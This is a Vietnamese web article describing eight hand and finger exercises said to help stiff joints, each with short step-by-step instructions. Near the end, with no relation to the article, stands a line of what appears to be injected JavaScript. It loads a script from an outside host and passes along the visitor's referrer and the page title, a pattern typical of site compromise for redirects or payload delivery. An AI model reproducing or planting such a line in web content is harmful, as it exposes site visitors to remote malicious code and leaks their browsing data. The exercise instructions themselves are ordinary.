Bất ngờ với 8 động tác tay cực kỳ hiệu quả đối với xương khớp

0
291
  1. Gập ngón cái

Để cho bàn tay thẳng, những ngón tay duỗi, gập ngón cái xuống hướng vào lòng bàn tay, càng với càng  xa càng tốt cho đến khi chạm đến ngón út. Giữ đúng như thế trong vòng vài giây rồi thả ra. Làm lặp đi lặp lại 10 lần.

Kết quả hình ảnh cho Bất ngờ với 8 động tác tay cực kỳ hiệu quả đối với xương khớp

(nguồn: internet) 

  1. Nắm tay

Bài tập này vô cùng hiệu quả khi mà khớp bàn tay bạn lại đặc biệt cứng. Bạn mở rộng ngón tay đồng thời từ từ nắm lại thành nắm đấm, giữ cho ngón cái nằm ở giữa những ngón tay. Thả lỏng tay và mở chúng ra từ từ cho đến khi những ngón tay thẳng. Làm lặp đi lặp lại 10 lần.

  1. Nhấc ngón tay

Úp sao cho bàn tay bạn với những ngón tay trải phẳng lên trên mặt bàn. Lần lượt theo đúng thứ tự, nhấc từng ngón một khỏi mặt bàn đồng thời giữ thế đó trong vòng vài giây, sau đó một cách từ từ thả xuống. Lặp đi lặp lại nhiều lần cho đến khi bạn cảm thấy thoải mái hơn.

  1. Nắm thành chữ O

Giữ cho tay ở vị trí là ngang tim ở phía trước ngực, chụm các ngón tay lại cùng với nhau để tạo thành hình chữ “O”. Ngón cái và ngón trỏ phải cho chạm vào nhau đồng thời tạo thành một vòng tròn bạn có thể nhìn thấy được khoảng trống bên trong lòng bàn tay. Giữ vị trí đó trong vòng vài giây rồi từ từ thả ra. Lặp đi lặp lại ít nhất 3 lần.

  1. Gập ngón tay

Bắt đầu với bàn tay duỗi thẳng. Gập ngón cái về phía bàn tay và giữ trong vài giây. Để tay thả trở lại vị trí ban đầu, sau đó bạn gập ngón trỏ về phía bàn tay, giữ trong vài giây và thả. Lặp đi lặp lại như thế với từng ngón một còn lại.

Kết quả hình ảnh cho Bất ngờ với 8 động tác tay cực kỳ hiệu quả đối với xương khớp

(nguồn: internet) 

  1. Căng duỗi cổ tay

Những ngón tay và bàn tay nối với phần khác của cơ thể bằng cổ tay. Với việc căng duỗi cổ tay, bạn sẽ được vận động một cách đẩy đủ hơn là chỉ vận động ngón và bàn tay.

Mở rộng một cánh tay cùng lòng bàn tay úp. Đặt ngón tay của bàn tay còn lại lên các ngón đang bị kéo căng, nhẹ nhàng đẩy lên đồng thời kéo lại, gập cổ tay. Giữ chúng như thế trong vài giây. Thả ra và lặp lại 10 lần.

  1. Ấn tay lên bàn

Đặt phần bàn tay ở phía cạnh của ngón út xuống bàn. Đặt hướng ngón cái lên trên, những ngón nắm vào trong sao cho chúng tạo thành biểu tượng “giơ ngón tay cái”. Nắm chặt những ngón tay vào lòng bàn tay. Giữ một vài giây rồi duỗi thẳng các ngón tay. Lặp đi lặp lại như thế 10 lần.

  1. Xòe và nắm

Bắt đầu bài tập với việc đặt bàn tay ở vị trí bình thường, những ngón tay duỗi thẳng. Dần dần bạn xòe rộng rồi kéo căng ngón tay càng xa càng tốt để cho nó xòe giống hình rẻ quạt. Giữ nguyên tư thế đó trong vài giây, sau đó co những ngón tay lại để tạo thành hình nắm đấm với lực xiết nhẹ. Giữ trong vòng 5 giây. Làm 2 lần một ngày.

Kết quả hình ảnh cho Bất ngờ với 8 động tác tay cực kỳ hiệu quả đối với xương khớp

(nguồn: internet) 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

NO COMMENTS